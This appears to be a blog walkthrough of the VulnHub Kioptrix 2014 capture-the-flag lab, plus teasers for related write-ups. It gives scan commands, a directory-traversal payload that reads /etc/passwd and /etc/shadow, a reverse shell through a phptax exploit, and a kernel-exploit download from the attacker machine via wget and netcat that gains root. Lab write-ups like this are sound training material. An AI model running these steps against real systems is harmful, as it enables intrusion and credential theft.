VulnHub: Kioptrix: 2014

Link: https://www.vulnhub.com/entry/kioptrix-2014-5,62/
- Network Discovery
nmap -sn 10.0.2.24/24
The target IP is 10.0.2.20.

2. Port scan
nmap -Pn 10.0.2.20nmap -Pn -p1000 10.0.2.20
There’re 2 open ports: 80 and 8080.

3. OS and service scan
nmap -A -p22,80,8080 10.0.2.20
There’re HTTP sites on both ports.

4. Vuln scan
nmap --script vuln -p22,80,8080 10.0.2.20
Couldn't find any more useful information.

5. Nikto scan
Port 80
nikto -h http://10.0.2.20
This system may be vulnerable to a remote buffer overflow.

Port 8080
nikto -h http://10.0.2.20:8080
The result was similar to port 80’s.

6. Directory scan
Port 80
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.20/ -x php,txt,html,sh,c
gi -q
/index.html

Port 8080
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.20/:8080 -x php,txt,html,sh,c
gi -q
I got a 403 return code.

7. Exploit w/ mod_ssl
I came across this script.
heltonWernik/OpenLuck
Original is OpenFu*&%$#, I change for something more elegant This Exploit ( https://www.exploit-db.com/exploits/764/)…
github.com
From previous Nikto scan:
Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
There’s no correct version in this script. I’ll have to try another way.

8. Accessing HTTP site
Start w/ port 80

View page source -> pChart2.1.3

Accessing port 8080

Viewing page source showed nothing

Back to port 80, I googled pChart2.1.3. and came across the exploit-db site.
Offensive Security's Exploit Database Archive
Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS # Date: 2014-01-24 # Exploit Author: Balazs Makany #…
www.exploit-db.com
Starting w/ Directory Traversal

Test the exploit
Acces pChart, intercept request w/ Burp Suite, and send to the Repeater
http://10.0.2.20/pChart2.1.3/examples/index.php

Test the exploit
/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/shadow
I don’t have permission to view this.

Back to the site on port 8080, I suspected that it returned forbidden status (403) because I didn't have the right agent.
user-agent configuration is located in
/usr/local/etc/apache22/httpd.conf
Let’s try w/ the exploit
Success!!!

After reading through the file, I found that user-agent was set to be Mozilla 4.0

I used this list of agents
Link: https://gist.github.com/pzb/b4b6f57144aea7827ae4
I used agent-switcher plugin w/ firefox and I can access the site.

It’s phptax.

Viewing page source revealed nothing

Googling phptax exploit
Offensive Security's Exploit Database Archive
phptax 0.8 - Remote Code Execution. CVE-86992 . webapps exploit for PHP platform
www.exploit-db.com

I will set up listener for reverse shell on port 1234
swisskyrepo/PayloadsAllTheThings
A list of useful payloads and bypass for Web Application Security and Pentest/CTF - swisskyrepo/PayloadsAllTheThings
github.com
I succeeded using this.

Edit IP and encode to URL w/ Burp Suite

Modified exploit string w/ encoded reverse shell command

Paste it to the browser, now I have a shell

9. Privilege escalation
Verify user
whoami
Seaching for password in:
/home, /tmp, /var/mail, /var/log
I couldn't find any usernames or passwords
Verify /etc/passwd permission

Verify /etc/shadow permission

Verify sudo
sudo -l

Verify SUID
find / -perm -u=s -type f 2>/dev/null
Nothing that I can use.

Verify capabilities
getcap -r / 2>/dev/null

Verify cron
cat /etc/crontab
Nothing that I can use.

Verify kernel
uname -a

Googling up, I found 3 scripts.

Tried the first script

searchsploit -m 28718

Prepare HTTP server at attacker machine
python -m SimpleHTTPServer 80

Prepare to store at /tmp on target machine
cd /tmpwget http://10.0.2.27/28718.c
I don’t have get command.

I’ll retrive w/ netcat instead.
On attacker machince
nc -nvlp 1337 < 28718.c

On target machine
nc -nv 10.0.2.7 1337 > priv.c

Compile
gcc priv.c -o priv

Run the compiled script
./privwhoami
Now I’m root.

cd /rootls -la

cat congrats.txt

ratiros01
Mar 12
Link: https://www.vulnhub.com/entry/kioptrix-level-13-4,25
- Network Discovery
nmap -sn 10.0.2.24/24
The machine ‘10.0.2.9’ is the target.

2. Port scan
nmap -Pn 10.0.2.9nmap -Pn -p1000- 10.0.2.9
There’re 4 ports: 22, 80, 139, 445.
Read more · 5 min read
Mar 11
Link: https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
- Network discovery
nmap -sn <ip>/24
My target is 10.0.2.8.

Reading VM’s file. I have to edit the host file.
Read more · 6 min read
Mar 11
Link: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
- Network discovery
nmap -sn <ip range>/24
The target is 10.0.2.7.

2. Port scan
nmap -Pn 10.0.2.7
Read more · 4 min read
Mar 10
Link: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Importing to VirtualBox: https://medium.com/uzair-ahmed/how-to-import-kioptrix-level-1-into-virtual-box-d83e8638be9d
- Network Scan
nmap -sn <ip>/24
The target’s IP is 10.0.2.6.

2. Port scan
nmap -Pn 10.0.2.6
There’re 5 ports: 22, 80, 111, 139, 443, 32768.
Read more · 4 min read
Sep 7, 2020
[Enumeration]
- Port scan
nmap -Pn <ip>
There’re 3 ports: 21,22, and 80.

2. OS and service scan
nmap -A -p 21,22,80 <ip>
There’re FTP with anonymous login, SSH, and HTTP.